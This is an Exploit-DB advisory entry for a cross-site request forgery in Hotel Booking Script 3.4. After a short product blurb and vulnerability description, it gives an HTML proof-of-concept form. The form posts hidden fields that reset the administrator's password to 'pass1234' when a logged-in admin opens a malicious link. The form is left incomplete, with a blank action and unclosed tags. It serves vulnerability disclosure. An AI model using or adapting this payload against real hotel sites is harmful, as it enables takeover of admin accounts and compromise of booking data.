Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password)

ID EDB-ID:46010
Type exploitdb
Reporter Exploit-DB
Modified 2018-12-19T00:00:00


                                            # Exploit Title: Admin Account take over Via CSRF
# Google Dork: N/A
# Date: 17-12-2018
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage:
# Software Link:
# Version: 3.4
# Tested on: Windows x64/ Kali linux x64
# CVE : N/A


The online hotel reservation system is built in PHP and uses MySQL to
store data. The script provides a powerful room booking and reservation
management functionality and allows you to install a clear
call-to-action tool on your hotel website which will impact conversions
and increase bookings. Our room booking system is highly customizable
and compatible with various website types.

*************************Vulnerability Description:****************
 An attacker can take the admin account via sending the Malicious link
to the authenticated user then the Victim clicks on the malicious link
then the admin password is change


  <script>history.pushState('', '', '/')</script>
    <form action=""
      <input type="hidden" name="user_update" value="1" />
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="role_id" value="1" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="password" value="pass1234" />
      <input type="hidden" name="name" value="Administrator" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="status" value="T" />
      <input type="submit" value="Submit request" />